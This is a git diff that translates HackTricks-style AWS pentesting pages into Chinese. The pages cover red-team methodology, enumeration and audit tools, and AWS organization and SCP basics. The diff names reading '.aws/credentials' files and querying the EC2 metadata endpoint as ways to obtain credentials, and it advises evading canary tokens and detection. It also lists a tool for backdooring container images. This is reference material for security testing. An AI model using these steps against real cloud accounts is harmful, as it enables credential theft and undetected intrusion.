+- **暴露敏感变量** +- **错误配置:** 用 `NEXT_PUBLIC_` 前缀敏感变量,使其在客户端可访问。 +- **风险:** API 密钥、数据库凭据或其他敏感数据暴露给公众,导致数据泄露。 +- **敏感禁用** +- **错误配置:** 如果禁用(默认),则可以读取生成的秘密的值。 +- **风险:** 意外暴露或未经授权访问敏感信息的可能性增加。 {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/README.md b/src/pentesting-cloud/aws-security/README.md index ad71de826..87bde5f7b 100644 --- a/src/pentesting-cloud/aws-security/README.md +++ b/src/pentesting-cloud/aws-security/README.md @@ -2,17 +2,17 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -**Before start pentesting** an **AWS** environment there are a few **basics things you need to know** about how AWS works to help you understand what you need to do, how to find misconfigurations and how to exploit them. +**在开始对** AWS **环境进行渗透测试之前,您需要了解一些关于AWS工作原理的基本知识,以帮助您理解需要做什么,如何找到错误配置以及如何利用它们。** -Concepts such as organization hierarchy, IAM and other basic concepts are explained in: +组织层次结构、IAM和其他基本概念在以下内容中进行了说明: {{#ref}} aws-basic-information/ {{#endref}} -## Labs to learn +## 学习实验室 - [https://github.com/RhinoSecurityLabs/cloudgoat](https://github.com/RhinoSecurityLabs/cloudgoat) - [https://github.com/BishopFox/iam-vulnerable](https://github.com/BishopFox/iam-vulnerable) @@ -22,49 +22,49 @@ aws-basic-information/ - [http://flaws.cloud/](http://flaws.cloud/) - [http://flaws2.cloud/](http://flaws2.cloud/) -Tools to simulate attacks: +模拟攻击的工具: - [https://github.com/Datadog/stratus-red-team/](https://github.com/Datadog/stratus-red-team/) - [https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main](https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main) -## AWS Pentester/Red Team Methodology +## AWS 渗透测试者/红队方法论 -In order to audit an AWS environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal AWS services an **external services** connected. +为了审计AWS环境,了解以下内容非常重要:哪些**服务正在使用**,什么**被暴露**,谁对什么有**访问权限**,以及内部AWS服务与**外部服务**是如何连接的。 -From a Red Team point of view, the **first step to compromise an AWS environment** is to manage to obtain some **credentials**. 
Here you have some ideas on how to do that: +从红队的角度来看,**攻陷AWS环境的第一步**是设法获取一些**凭证**。以下是一些获取凭证的想法: -- **Leaks** in github (or similar) - OSINT -- **Social** Engineering -- **Password** reuse (password leaks) -- Vulnerabilities in AWS-Hosted Applications - - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint - - **Local File Read** - - `/home/USERNAME/.aws/credentials` - - `C:\Users\USERNAME\.aws\credentials` -- 3rd parties **breached** -- **Internal** Employee -- [**Cognito** ](aws-services/aws-cognito-enum/#cognito)credentials +- **在github(或类似平台)中的泄露** - OSINT +- **社会工程学** +- **密码**重用(密码泄露) +- AWS托管应用程序中的漏洞 +- [**服务器端请求伪造**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf)访问元数据端点 +- **本地文件读取** +- `/home/USERNAME/.aws/credentials` +- `C:\Users\USERNAME\.aws\credentials` +- 第三方**被攻破** +- **内部**员工 +- [**Cognito**](aws-services/aws-cognito-enum/#cognito)凭证 -Or by **compromising an unauthenticated service** exposed: +或者通过**攻陷一个未认证的服务**: {{#ref}} aws-unauthenticated-enum-access/ {{#endref}} -Or if you are doing a **review** you could just **ask for credentials** with these roles: +或者如果您正在进行**审查**,您可以直接**请求凭证**,使用这些角色: {{#ref}} aws-permissions-for-a-pentest.md {{#endref}} > [!NOTE] -> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration: +> 在您成功获取凭证后,您需要知道**这些凭证属于谁**,以及**他们可以访问什么**,因此您需要执行一些基本的枚举: -## Basic Enumeration +## 基本枚举 ### SSRF -If you found a SSRF in a machine inside AWS check this page for tricks: +如果您在AWS内部的机器上发现了SSRF,请查看此页面以获取技巧: {{#ref}} https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf @@ -72,8 +72,7 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou ### Whoami -One of the first things you need to know is who you are (in where account you are in other info about the AWS env): - +您需要了解的第一件事是您是谁(您所在的账户以及有关AWS环境的其他信息): ```bash # Easiest way, but might be monitored? aws sts get-caller-identity @@ -89,10 +88,9 @@ aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document ``` - > [!CAUTION] -> Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\ -> For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass). +> 注意,公司可能会使用 **canary tokens** 来识别 **令牌被盗用和使用** 的情况。在使用令牌之前,建议检查它是否为 canary token。\ +> 更多信息请 [**查看此页面**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass)。 ### Org Enumeration @@ -102,30 +100,30 @@ aws-services/aws-organizations-enum.md ### IAM Enumeration -If you have enough permissions **checking the privileges of each entity inside the AWS account** will help you understand what you and other identities can do and how to **escalate privileges**. 
+如果您拥有足够的权限,**检查 AWS 账户内每个实体的权限** 将帮助您了解您和其他身份可以做什么,以及如何 **提升权限**。 -If you don't have enough permissions to enumerate IAM, you can **steal bruteforce them** to figure them out.\ -Check **how to do the numeration and brute-forcing** in: +如果您没有足够的权限来枚举 IAM,您可以 **通过暴力破解来获取** 它们。\ +请查看 **如何进行枚举和暴力破解**: {{#ref}} aws-services/aws-iam-enum.md {{#endref}} > [!NOTE] -> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\ -> In the following section you can check some ways to **enumerate some common services.** +> 现在您 **已经获得了一些关于您凭据的信息**(如果您是红队,希望您 **没有被检测到**)。是时候找出环境中正在使用哪些服务。\ +> 在以下部分,您可以查看一些 **枚举常见服务** 的方法。 ## Services Enumeration, Post-Exploitation & Persistence -AWS has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets\*\*,\*\* how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them: +AWS 拥有惊人的服务数量,在以下页面中,您将找到 **基本信息、枚举** 备忘单\*\*,\*\* 如何 **避免检测**,获取 **持久性**,以及其他 **后期利用** 技巧: {{#ref}} aws-services/ {{#endref}} -Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automated-tools). +请注意,您 **不** 需要 **手动** 执行所有工作,下面的帖子中您可以找到关于 [**自动工具**](./#automated-tools) 的 **部分**。 -Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them: +此外,在此阶段,您可能会发现 **更多暴露给未认证用户的服务**,您可能能够利用它们: {{#ref}} aws-unauthenticated-enum-access/ @@ -133,7 +131,7 @@ aws-unauthenticated-enum-access/ ## Privilege Escalation -If you can **check at least your own permissions** over different resources you could **check if you are able to obtain further permissions**. You should focus at least in the permissions indicated in: +如果您可以 **检查至少自己的权限** 在不同资源上,您可以 **检查是否能够获得更多权限**。您应该至少关注以下权限: {{#ref}} aws-privilege-escalation/ @@ -141,10 +139,10 @@ aws-privilege-escalation/ ## Publicly Exposed Services -While enumerating AWS services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\ -As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**. +在枚举 AWS 服务时,您可能发现其中一些 **向互联网暴露元素**(虚拟机/容器端口、数据库或队列服务、快照或存储桶...)。\ +作为渗透测试者/红队成员,您应该始终检查是否可以在它们上找到 **敏感信息/漏洞**,因为它们可能为您提供 **进一步访问 AWS 账户** 的机会。 -In this book you should find **information** about how to find **exposed AWS services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in: +在本书中,您应该找到 **关于如何查找暴露的 AWS 服务以及如何检查它们的信息**。关于如何查找 **暴露网络服务中的漏洞**,我建议您 **搜索** 特定的 **服务** 在: {{#ref}} https://book.hacktricks.xyz/ @@ -154,52 +152,49 @@ https://book.hacktricks.xyz/ ### From the root/management account -When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`** and giving **AdministratorAccess** policy to the **management account** to access the new account. +当管理账户在组织中创建新账户时,会在新账户中创建一个 **新角色**,默认命名为 **`OrganizationAccountAccessRole`**,并给予 **管理账户** 访问新账户的 **AdministratorAccess** 策略。
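If you already hold credentials in the management account, a quick way to test this trust is to list the member accounts and try to assume that default role in one of them. A minimal sketch (the account ID and session name are placeholders, and the role may have been renamed when the account was created):

```bash
# From the management account: list the member accounts of the organization
aws organizations list-accounts --query 'Accounts[].{Id:Id,Name:Name}' --output table

# Try to assume the default cross-account admin role in a child account
# (123456789012 is a placeholder account ID)
aws sts assume-role \
  --role-arn arn:aws:iam::123456789012:role/OrganizationAccountAccessRole \
  --role-session-name org-admin-check
```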
-So, in order to access as administrator a child account you need: +因此,要以管理员身份访问子账户,您需要: -- **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin. - - To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts` - - You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**. -- **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary). +- **攻陷** **管理** 账户并找到 **子账户的 ID** 和 **角色的名称**(默认是 OrganizationAccountAccessRole),以允许管理账户以管理员身份访问。 +- 要查找子账户,请转到 AWS 控制台中的组织部分或运行 `aws organizations list-accounts` +- 您无法直接找到角色的名称,因此请检查所有自定义 IAM 策略,并搜索任何允许 **`sts:AssumeRole` 在之前发现的子账户上** 的策略。 +- **攻陷** 管理账户中的 **主体**,并具有 **`sts:AssumeRole` 权限** 在子账户的角色上(即使该账户允许管理账户中的任何人进行冒充,由于这是外部账户,特定的 `sts:AssumeRole` 权限是必要的)。 ## Automated Tools ### Recon -- [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby. - +- [**aws-recon**](https://github.com/darkbitio/aws-recon): 一个多线程的 AWS 安全专注的 **库存收集工具**,用 Ruby 编写。 ```bash # Install gem install aws_recon # Recon and get json AWS_PROFILE= aws_recon \ - --services S3,EC2 \ - --regions global,us-east-1,us-east-2 \ - --verbose +--services S3,EC2 \ +--regions global,us-east-1,us-east-2 \ +--verbose ``` - -- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers. -- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues. - +- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist 是一个 **多云工具,用于获取资产**(主机名,IP 地址)来自云服务提供商。 +- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper 帮助您分析您的亚马逊网络服务(AWS)环境。它现在包含更多功能,包括安全问题的审计。 ```bash # Installation steps in github # Create a config.json file with the aws info, like: { - "accounts": [ - { - "default": true, - "id": "", - "name": "dev" - } - ], - "cidrs": - { - "2.2.2.2/28": {"name": "NY Office"} - } +"accounts": [ +{ +"default": true, +"id": "", +"name": "dev" +} +], +"cidrs": +{ +"2.2.2.2/28": {"name": "NY Office"} +} } # Enumerate @@ -229,9 +224,7 @@ python3 cloudmapper.py public --accounts dev python cloudmapper.py prepare #Prepare webserver python cloudmapper.py webserver #Show webserver ``` - -- [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database. 
- +- [**cartography**](https://github.com/lyft/cartography): Cartography 是一个 Python 工具,它将基础设施资产及其之间的关系整合在一个由 Neo4j 数据库驱动的直观图形视图中。 ```bash # Install pip install cartography @@ -240,17 +233,15 @@ pip install cartography # Get AWS info AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j ``` - -- [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database. -- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account. -- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account. +- [**starbase**](https://github.com/JupiterOne/starbase): Starbase 收集来自服务和系统的资产和关系,包括云基础设施、SaaS 应用程序、安全控制等,形成一个直观的图形视图,支持 Neo4j 数据库。 +- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (使用 python2) 这是一个工具,尝试 **发现所有** [**AWS 资源**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) 在一个账户中创建的。 +- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): 这是一个工具,用于 **获取与 AWS 账户关联的所有公共 IP 地址**(包括 IPv4/IPv6)。 ### Privesc & Exploiting -- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1). -- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict. - - Note that pacu **only checks your own privescs paths** (not account wide). 
- +- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** 发现扫描的 AWS 环境中最特权的用户,包括 AWS Shadow Admins。它使用 powershell。您可以在 [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1) 的 **`Check-PrivilegedPolicy`** 函数中找到 **特权策略的定义**。 +- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu 是一个开源的 **AWS 利用框架**,旨在针对云环境进行攻击性安全测试。它可以 **枚举**、查找 **错误配置** 并 **利用** 它们。您可以在 [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) 的 **`user_escalation_methods`** 字典中找到 **特权权限的定义**。 +- 请注意,pacu **仅检查您自己的 privescs 路径**(而不是账户范围内)。 ```bash # Install ## Feel free to use venvs @@ -264,9 +255,7 @@ pacu > exec iam__enum_permissions # Get permissions > exec iam__privesc_scan # List privileged permissions ``` - -- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing) - +- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) 是一个脚本和库,用于识别 AWS 账户或 AWS 组织中 AWS 身份和访问管理 (IAM) 配置的风险。它将账户中的不同 IAM 用户和角色建模为有向图,从而能够检查 **权限提升** 和攻击者可能采取的获取 AWS 中资源或操作的替代路径。您可以在 [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing) 中检查用于查找 privesc 路径的 **权限**,文件名以 `_edges.py` 结尾。 ```bash # Install pip install principalmapper @@ -288,10 +277,8 @@ pmapper --profile dev query 'preset privesc *' # Get privescs with admins pmapper --profile dev orgs create pmapper --profile dev orgs display ``` - -- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\ - It will show you potentially **over privileged** customer, inline and aws **policies** and which **principals has access to them**. (It not only checks for privesc but also other kind of interesting permissions, recommended to use). 
- +- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining 是一个 AWS IAM 安全评估工具,识别最小权限的违规行为并生成风险优先级的 HTML 报告。\ +它将向您显示潜在的 **过度权限** 客户、内联和 aws **策略** 以及哪些 **主体可以访问它们**。 (它不仅检查权限提升,还检查其他有趣的权限,建议使用)。 ```bash # Install pip install cloudsplaining @@ -303,24 +290,20 @@ cloudsplaining download --profile dev # Analyze the IAM policies cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/ ``` +- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack 评估 AWS 账户的 **子域劫持漏洞**,这是由于 Route53 和 CloudFront 配置的解耦造成的。 +- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): 列出 ECR 仓库 -> 拉取 ECR 仓库 -> 后门化 -> 推送后门化镜像 +- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag 是一个工具,**搜索**公共弹性块存储 (**EBS**) 快照中的秘密,这些秘密可能被意外遗留。 -- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations. -- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image -- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in. - -### Audit - -- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins). +### 审计 +- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit 由 Aqua 开发,是一个开源项目,旨在检测云基础设施账户中的 **安全风险**,包括:亚马逊网络服务 (AWS)、微软 Azure、谷歌云平台 (GCP)、甲骨文云基础设施 (OCI) 和 GitHub(它不查找 ShadowAdmins)。 ```bash ./index.js --csv=file.csv --console=table --config ./config.js # Compiance options: --compliance {hipaa,cis,cis1,cis2,pci} ## use "cis" for cis level 1 and 2 ``` - -- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness. - +- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler 是一个开源安全工具,用于执行 AWS 安全最佳实践评估、审计、事件响应、持续监控、加固和取证准备。 ```bash # Install python3, jq and git # Install @@ -331,15 +314,11 @@ prowler -v prowler prowler aws --profile custom-profile [-M csv json json-asff html] ``` - -- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure. - +- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox 帮助您在不熟悉的云环境中获得情境意识。它是一个开源命令行工具,旨在帮助渗透测试人员和其他进攻性安全专业人员在云基础设施中找到可利用的攻击路径。 ```bash cloudfox aws --profile [profile-name] all-checks ``` - -- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. 
- +- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite 是一个开源的多云安全审计工具,能够对云环境进行安全态势评估。 ```bash # Install virtualenv -p python3 venv @@ -350,18 +329,16 @@ scout --help # Get info scout aws -p dev ``` +- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): 云安全套件 (使用 python2.7,似乎未维护) +- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus 是一个强大的工具,用于 AWS EC2 / S3 / CloudTrail / CloudWatch / KMS 最佳加固实践 (似乎未维护)。它仅检查系统内默认配置的凭据。 -- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained) -- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system. +### 持续审计 -### Constant Audit - -- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting. -- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions. -- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response. - -## DEBUG: Capture AWS cli requests +- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian 是一个用于管理公共云账户和资源的规则引擎。它允许用户 **定义策略以启用良好管理的云基础设施**,既安全又成本优化。它将组织中许多临时脚本整合为一个轻量级和灵活的工具,具有统一的指标和报告。 +- [**pacbot**](https://github.com/tmobile/pacbot)**: 代码即政策机器人 (PacBot)** 是一个用于 **持续合规监控、合规报告和云安全自动化** 的平台。在 PacBot 中,安全和合规政策以代码形式实现。PacBot 发现的所有资源都根据这些政策进行评估,以衡量政策符合性。PacBot **自动修复** 框架提供了通过采取预定义措施自动响应政策违规的能力。 +- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert 是一个无服务器的 **实时** 数据分析框架,使您能够 **摄取、分析和警报** 来自任何环境的数据,**使用您定义的数据源和警报逻辑**。计算机安全团队使用 StreamAlert 每天扫描数 TB 的日志数据以进行事件检测和响应。 +## DEBUG: 捕获 AWS cli 请求 ```bash # Set proxy export HTTP_PROXY=http://localhost:8080 @@ -380,14 +357,9 @@ export AWS_CA_BUNDLE=~/Downloads/certificate.pem # Run aws cli normally trusting burp cert aws ... 
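# When finished, undo the proxy setup so later aws cli calls stop going through Burp
# (assuming the variables above were exported in this same shell)
unset HTTP_PROXY HTTPS_PROXY AWS_CA_BUNDLE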
``` - -## References +## 参考 - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) - [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/README.md b/src/pentesting-cloud/aws-security/aws-basic-information/README.md index 02e6e7729..2b318a3ca 100644 --- a/src/pentesting-cloud/aws-security/aws-basic-information/README.md +++ b/src/pentesting-cloud/aws-security/aws-basic-information/README.md @@ -1,331 +1,315 @@ -# AWS - Basic Information +# AWS - 基本信息 {{#include ../../../banners/hacktricks-training.md}} -## Organization Hierarchy +## 组织层级 ![](<../../../images/image (151).png>) -### Accounts +### 账户 -In AWS there is a **root account,** which is the **parent container for all the accounts** for your **organization**. However, you don't need to use that account to deploy resources, you can create **other accounts to separate different AWS** infrastructures between them. +在 AWS 中有一个 **根账户,** 它是您 **组织中所有账户的父容器**。然而,您不需要使用该账户来部署资源,您可以创建 **其他账户以将不同的 AWS** 基础设施分开。 -This is very interesting from a **security** point of view, as **one account won't be able to access resources from other account** (except bridges are specifically created), so this way you can create boundaries between deployments. +从 **安全** 的角度来看,这非常有趣,因为 **一个账户无法访问其他账户的资源**(除非专门创建了桥接),因此您可以在部署之间创建边界。 -Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts. +因此,在一个组织中有 **两种类型的账户**(我们谈论的是 AWS 账户,而不是用户账户):一个被指定为管理账户的单一账户,以及一个或多个成员账户。 -- The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following: +- **管理账户(根账户)** 是您用来创建组织的账户。从组织的管理账户,您可以执行以下操作: - - Create accounts in the organization - - Invite other existing accounts to the organization - - Remove accounts from the organization - - Manage invitations - - Apply policies to entities (roots, OUs, or accounts) within the organization - - Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization. - - It's possible to login as the root user using the email and password used to create this root account/organization. +- 在组织中创建账户 +- 邀请其他现有账户加入组织 +- 从组织中移除账户 +- 管理邀请 +- 对组织内的实体(根、OU 或账户)应用政策 +- 启用与支持的 AWS 服务的集成,以在组织中的所有账户之间提供服务功能。 +- 可以使用用于创建此根账户/组织的电子邮件和密码以根用户身份登录。 - The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account. - -- **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account. - - Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it). 
+管理账户具有 **付款账户的责任**,并负责支付所有由成员账户产生的费用。您无法更改组织的管理账户。 +- **成员账户** 组成了组织中所有其他账户。一个账户一次只能是一个组织的成员。您可以将政策附加到一个账户,以仅对该账户应用控制。 +- 成员账户 **必须使用有效的电子邮件地址**,并可以有一个 **名称**,通常他们将无法管理账单(但可能会被授予访问权限)。 ``` aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com ``` +### **组织单位** -### **Organization Units** - -Accounts can be grouped in **Organization Units (OU)**. This way, you can create **policies** for the Organization Unit that are going to be **applied to all the children accounts**. Note that an OU can have other OUs as children. - +账户可以被分组为 **组织单位 (OU)**。通过这种方式,您可以为组织单位创建 **策略**,这些策略将 **应用于所有子账户**。请注意,一个 OU 可以有其他 OU 作为子单位。 ```bash # You can get the root id from aws organizations list-roots aws organizations create-organizational-unit --parent-id r-lalala --name TestOU ``` - ### Service Control Policy (SCP) -A **service control policy (SCP)** is a policy that specifies the services and actions that users and roles can use in the accounts that the SCP affects. SCPs are **similar to IAM** permissions policies except that they **don't grant any permissions**. Instead, SCPs specify the **maximum permissions** for an organization, organizational unit (OU), or account. When you attach a SCP to your organization root or an OU, the **SCP limits permissions for entities in member accounts**. +一个 **服务控制策略 (SCP)** 是一种策略,指定用户和角色在受 SCP 影响的账户中可以使用的服务和操作。SCP **类似于 IAM** 权限策略,但它们 **不授予任何权限**。相反,SCP 指定了组织、组织单位 (OU) 或账户的 **最大权限**。当您将 SCP 附加到您的组织根或 OU 时,**SCP 限制成员账户中实体的权限**。 -This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\ -The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked). +这是 **即使是根用户也无法被阻止** 执行某些操作的唯一方法。例如,它可以用于阻止用户禁用 CloudTrail 或删除备份。\ +绕过此限制的唯一方法是同时攻陷配置 SCP 的 **主账户**(主账户无法被阻止)。 > [!WARNING] -> Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account. +> 请注意,**SCP 仅限制账户中的主体**,因此其他账户不受影响。这意味着拥有一个 SCP 拒绝 `s3:GetObject` 不会阻止人们 **访问您账户中的公共 S3 存储桶**。 -SCP examples: +SCP 示例: -- Deny the root account entirely -- Only allow specific regions -- Only allow white-listed services -- Deny GuardDuty, CloudTrail, and S3 Public Block Access from +- 完全拒绝根账户 +- 仅允许特定区域 +- 仅允许白名单服务 +- 拒绝禁用 GuardDuty、CloudTrail 和 S3 公共阻止访问 - being disabled +- 拒绝删除或修改安全/事件响应角色。 -- Deny security/incident response roles from being deleted or +- 拒绝删除备份。 +- 拒绝创建 IAM 用户和访问密钥 - modified. - -- Deny backups from being deleted. 
